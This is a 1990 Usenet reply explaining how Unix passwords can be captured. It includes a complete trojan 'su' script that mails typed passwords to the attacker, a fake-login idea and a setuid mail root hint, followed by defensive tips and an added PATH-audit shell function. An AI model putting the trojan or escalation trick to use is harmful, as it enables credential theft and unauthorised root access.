jr@bwilab3.UUCP (Eugene W Coleman) (09/21/90)
In-Reply-To: your article <8354@helios.TAMU.EDU>

> Some of my friends are challenging me
> saying that they will be able to tell
> my password in a relatively short time.
>
> Is it possible to break passwords so
> easily in Unix Systems ? Is it
> possible to "catch" passwords while
> they are being typed at the terminal ?
>
> Suresh Peram

Sorry I had to post this. I attempted to mail my response but it was returned.

Suresh,

You really haven't supplied enough information for me to answer, but I can
give you some clues as to how they might accomplish this.

Stick this version of 'su' in a directory that is in a user's PATH shell
variable prior to the /bin.

    idiot=$1
    stty -echo
    echo "Password:\c"
    read IdiotsPwd
    echo ""
    stty echo
    echo $idiot\'s passwd is $IdiotsPwd | mail 'your-login-id'
    sleep 1
    echo "su: Sorry"
    rm su

You can also apply the same ideas to .profile and .login files.

or

Write a program that creates a login screen to accept their login and passwd.
Have it fail the first and second attempt ( 2 copies to validate from), then
have the program mail the values of those variables to you and delete itself.
Then getty will take the port and service their login.

or

Only a hint: (very powerful)
The mail program has set user id permission, thus a properly placed hard link
and mail message could get you the root login in a flash.

If you would like to protect yourself, lock up your cron.tab, .profile, mail
command, move important commands, and set up aliases with the full path to
things like su.

Or don't give anyone a login/passwd on your system.

Well, I hope this helps you out. Remember.... as long as there is security
there will be breaches.

jr

*******************************************************************************
* Eugene W. Coleman, Jr | Bradley Ward Inc. | Mental Marksman at Large        *
* (404) 396-4292        | Atlanta, Ga 30328 |                                 *
* That place we call %*@!&$!   ...uunet!gatech!galbp!bwilab3!jr               *
*                                                                             *
* HP always asks 'What if', We can't stop asking 'WHY' ?                      *
*******************************************************************************
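
The full-path advice at the end of the post addresses one condition: a directory searched before /bin that can hold a look-alike command. As an added example (not part of the original post), this POSIX shell function lists the PATH entries that come before a trusted directory and are relative, writable by other users, or already contain the named command. The function name, the finding labels and the scratch-directory demo are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original post.
# Usage: path_shadow_audit COMMAND PATH_STRING TRUSTED_DIR
# Prints one finding per line; prints nothing when nothing is found.
path_shadow_audit() (
    cmd=$1 search=$2 trusted=$3
    # A trailing ':' is an empty entry (the current directory) that field
    # splitting would drop, so make it explicit.
    case $search in *:) search="${search}." ;; esac
    IFS=:
    set -f                      # no globbing while splitting the PATH
    for dir in $search; do
        [ "$dir" = "$trusted" ] && exit 0   # later entries cannot shadow
        case $dir in
            /*) ;;
            *)  echo "RELATIVE: entry '$dir' resolves against the current directory"
                [ -n "$dir" ] || dir=. ;;
        esac
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            echo "SHADOW: $dir/$cmd is found before $trusted/$cmd"
        fi
        [ -d "$dir" ] || continue
        # Characters 6 and 9 of the mode string are group and other write.
        mode=$(ls -ldL -- "$dir" | cut -c1-10)
        case $mode in
            ?????w*|????????w*)
                echo "WRITABLE: $dir ($mode) can be written by other users" ;;
        esac
    done
    echo "MISSING: $trusted is not in the PATH"
)

# Constructed demo: a scratch directory holding a harmless stand-in "su".
demo() {
    tmp=$(mktemp -d) || return 1
    mkdir "$tmp/bin" && chmod 777 "$tmp/bin"
    printf '#!/bin/sh\n' > "$tmp/bin/su" && chmod 755 "$tmp/bin/su"
    path_shadow_audit su "$tmp/bin::/bin:/usr/bin" /bin
    rm -rf "$tmp"
}
demo
```

Run it against the PATH of each account that is allowed to use su, for example `path_shadow_audit su "$PATH" /bin`.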